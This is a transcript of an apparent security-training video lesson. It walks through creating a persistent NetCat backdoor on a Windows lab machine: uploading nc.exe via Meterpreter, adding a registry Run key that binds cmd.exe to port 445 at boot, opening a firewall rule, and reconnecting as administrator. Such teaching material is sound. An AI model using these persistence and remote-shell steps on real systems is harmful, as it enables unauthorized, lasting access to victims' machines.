Time
5 hours 38 minutes
Difficulty
Intermediate
CEU/CPE
6

Video Description

This lesson covers how to create a persistent backdoor with NetCat. Participants receive step-by-step instructions for creating a persistent backdoor using the NetCat tool. It lets you choose a port, pick a program you'd like to run on another computer, and then connect whenever you want. NetCat is included in the Metasploit framework.

Video Transcription

00:04
All right, so now
00:05
we're gonna go a little bit further and
00:08
what I'm trying to do at this point is to create a backdoor. We've already seen some backdoors,
00:15
but they're not persistent. It relies on
00:19
the user, or the victim rather, clicking and running a program, running a file. Trying to put that in a place on the system where it would load every time they boot, for instance, would be a good technique:
00:29
trying to get a virus into the boot, the master boot record, or somewhere else, the startup folder perhaps. You can get that to run.
00:40
But what I want to try to do, in the meantime, is use a tool called NetCat.
00:43
And NetCat's very useful because you can set up a listener on a victim's system
00:48
and pick a port number of your choice and a program that you'd like to run,
00:52
and that lets you connect any time you want
00:55
to that system, assuming that NetCat is running.
00:59
So NetCat is included
01:03
in Meterpreter, or the Metasploit framework I should say.
01:07
And so what I'm gonna do is run the upload command,
01:11
and I think I've got it here. So this is the path: /usr/share/windows-binaries/nc.exe.
01:23
Notice I'm using double backslashes. As I mentioned before, there are some parsing issues, so the double backslash just gets us around that problem,
01:32
but what we want to do first is upload the NetCat executable to the Windows directory on the victim's system.
01:40
You see? Let me do that.
01:41
Uh, because again, I am
01:44
the system account. If you're not system, you won't be able to put the file in that directory and you'd have to
01:49
try to put it somewhere else.
01:51
But I want to run it from this directory because that's, uh,
01:55
My first choice.
01:59
All right. Now what we're gonna do is
02:01
to add a registry key
02:04
so that we can get this,
02:07
uh,
02:07
program to run every time
02:09
the system boots.
02:20
All right, so
02:22
from the Meterpreter shell,
02:25
I need to type this in very carefully.
02:30
HKLM,
02:32
Software,
02:38
Microsoft,
02:40
Windows,
02:45
CurrentVersion,
02:46
Run.
02:52
I'm missing one of my backslashes, and as I said before, that'll cause problems. There we go.
03:00
Look.
03:02
So there's my VMware, uh, user process,
03:08
and I've got another command to run. I'm gonna up-arrow to bring back my last one. Instead of reg enumkey, I'm going to run the setval command.
03:23
And that should be -k HKLM\Software\Microsoft\Windows\CurrentVersion\Run,
03:30
and then I need to
03:34
add a little bit after this.
03:39
So NetCat,
03:42
-d is the value I'm setting
03:45
in this key,
03:51
and I'm gonna give it the path to NetCat,
03:57
nc.exe,
04:00
and I'm telling it which port I'd like the listener to run on, 445,
04:08
and then run cmd.exe as the actual,
04:12
uh, command when the
04:15
listener is connected to.
04:17
Now I can query the value that I've just set.
04:29
Get rid of all this
04:30
and just change setval to queryval.
04:40
And this just confirmed that indeed I have the right parameters set here,
04:46
so I'm running NetCat
04:48
persistent.
04:49
Uh, this is the path to it, a listening port of 445, and the command will be cmd.exe.
04:58
Okay, so our next task is to
05:04
go ahead and, uh,
05:06
open up a rule in the firewall,
05:10
create a rule in the firewall rather,
05:12
so that we can allow this 445 traffic through.
05:16
A lot of typing here.
05:18
So we're running netsh advfirewall,
05:25
the firewall module,
05:27
and then we're gonna add a rule.
05:30
We're gonna call the rule
05:35
NetCat, just for now. That's fine. We have to specify several parameters here, but all this should make sense if you've worked with firewalls before.
05:44
Uh, we're specifying the protocol, TCP,
05:46
the local port is 445,
05:53
direction is inbound,
05:57
the action is allow,
06:01
and the program
06:02
that's being referenced is C:\Windows\
06:09
System32\nc.exe.
06:14
It's a little typing.
06:17
Oh, well, the reason that didn't work is because I'm not in a command shell.
06:21
Hold on one second.
06:30
There we go. I am still system.
06:32
Now I can run that command.
06:35
Okay, so it gave me my OK statement, which showed me that the firewall rule worked.
06:45
Now, since I've put the registry key into the
06:50
into this key, Software\Microsoft\Windows\CurrentVersion\Run,
06:56
that means that when I reboot
06:59
the
07:00
virtual machine,
07:01
it should load
07:06
that, um,
07:10
program,
07:11
listening on 445.
07:15
I'll go ahead and pause so I can reboot.
07:17
Okay, so we lost our Meterpreter session, which is expected when we reboot,
07:24
and I'm gonna go ahead and go to another command shell.
07:28
And now I'm going to see if my NetCat connection actually works.
07:34
So NetCat's built into Kali; you don't need to specify its path.
07:43
I'm gonna use the verbose option,
07:45
and I'll get the address of my victim's system
07:49
and the port number.
08:00
This might take a moment,
08:09
and there we go.
08:11
It gave me a message about inverse host lookup failed. That's fine.
08:16
whoami.
08:16
I have logged in as an administrator, which is good.
08:20
Now, this is a persistent connection that I have to the system. Anytime I want
08:24
to log in, I just simply use NetCat and go to this port.
08:30
Very cool.
08:33
All right, that's it for the NetCat section. Thank you.


Instructed By

Dean Pompilio
CEO of SteppingStone Solutions
Instructor